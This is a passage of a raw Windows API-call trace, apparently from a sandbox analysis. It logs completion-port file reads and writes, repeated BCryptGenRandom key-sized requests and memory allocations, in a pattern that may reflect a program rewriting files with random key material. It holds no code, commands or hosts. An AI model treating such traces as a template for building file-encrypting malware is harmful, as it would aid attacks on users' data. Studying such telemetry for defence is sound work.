lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.221] CloseHandle (hObject=0x3ac) returned 1 [0110.222] free (_Block=0x1ff1e60) [0110.222] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0110.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0110.230] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.230] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.230] free (_Block=0x77d800) [0110.230] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.230] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.231] free (_Block=0x1fa4848) [0110.231] free (_Block=0x2071818) [0110.231] free (_Block=0x77d908) [0110.231] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.231] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.232] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa7f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.232] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.242] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa79c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0110.243] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0110.355] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.356] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0110.356] calloc (_Count=0x40, _Size=0x4) returned 0x77d8b0 [0110.356] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.356] free (_Block=0x77d8b0) [0110.356] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4958 [0110.356] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.357] free (_Block=0x1fa4958) [0110.357] free (_Block=0x2071818) [0110.357] free (_Block=0x1fa4848) [0110.357] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0110.360] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.376] CloseHandle (hObject=0x3bc) returned 1 [0110.377] free (_Block=0x3ef0008) [0110.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0110.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0110.389] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.389] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.389] free (_Block=0x77d800) [0110.389] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.389] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.389] free (_Block=0x1fa4848) [0110.389] free (_Block=0x2071818) [0110.389] free (_Block=0x77d908) [0110.389] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.390] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.166] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xe30, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.166] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.174] CloseHandle (hObject=0x340) returned 1 [0112.176] free (_Block=0x1ff1e60) [0112.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.186] ReadFile (in: hFile=0x344, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xe20, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.189] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x85c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.237] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xaec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.237] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.247] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xb90, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0112.247] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.317] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0112.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.321] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0112.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.400] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.400] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.617] CloseHandle (hObject=0x3bc) returned 1 [0112.618] free (_Block=0x1ff1e60) [0112.618] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.629] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.629] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0112.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0112.634] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.634] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.634] free (_Block=0x77d7a8) [0112.634] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.634] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.634] free (_Block=0x2071c20) [0112.634] free (_Block=0x2071d30) [0112.634] free (_Block=0x77d8b0) [0112.635] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0112.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.694] CloseHandle (hObject=0x3bc) returned 1 [0112.695] free (_Block=0x1ff1e60) [0112.695] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.696] CloseHandle (hObject=0x81c) returned 1 [0112.697] free (_Block=0x3e70008) [0112.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.697] CloseHandle (hObject=0x340) returned 1 [0112.699] free (_Block=0x3ef0008) [0112.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.938] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0112.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0112.940] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.940] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.940] free (_Block=0x77d7a8) [0112.940] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.940] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.940] free (_Block=0x2071c20) [0112.940] free (_Block=0x2071d30) [0112.940] free (_Block=0x77d8b0) [0112.940] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0112.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0112.941] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0112.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.198] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x824, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.198] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.207] CloseHandle (hObject=0x2f4) returned 1 [0113.208] free (_Block=0x1ff1e60) [0113.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.219] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x5a8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.232] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xbb4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0113.232] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.253] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.285] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0113.286] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.289] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.292] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.302] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.303] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0113.303] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.303] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0113.304] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.304] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.304] free (_Block=0x77d7a8) [0113.304] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.304] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.304] free (_Block=0x2071c20) [0113.304] free (_Block=0x2071d30) [0113.304] free (_Block=0x77d8b0) [0113.304] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0113.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0113.315] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.316] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.316] free (_Block=0x77d7a8) [0113.316] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.316] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.316] free (_Block=0x2071c20) [0113.316] free (_Block=0x2071d30) [0113.316] free (_Block=0x77d8b0) [0113.316] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0113.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0113.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0113.327] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.327] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.327] free (_Block=0x77d7a8) [0113.327] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.327] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.328] free (_Block=0x2071c20) [0113.328] free (_Block=0x2071d30) [0113.328] free (_Block=0x77d8b0) [0113.328] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0113.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.386] BCryptGenRandom (in: hAlgorithm=0x0, 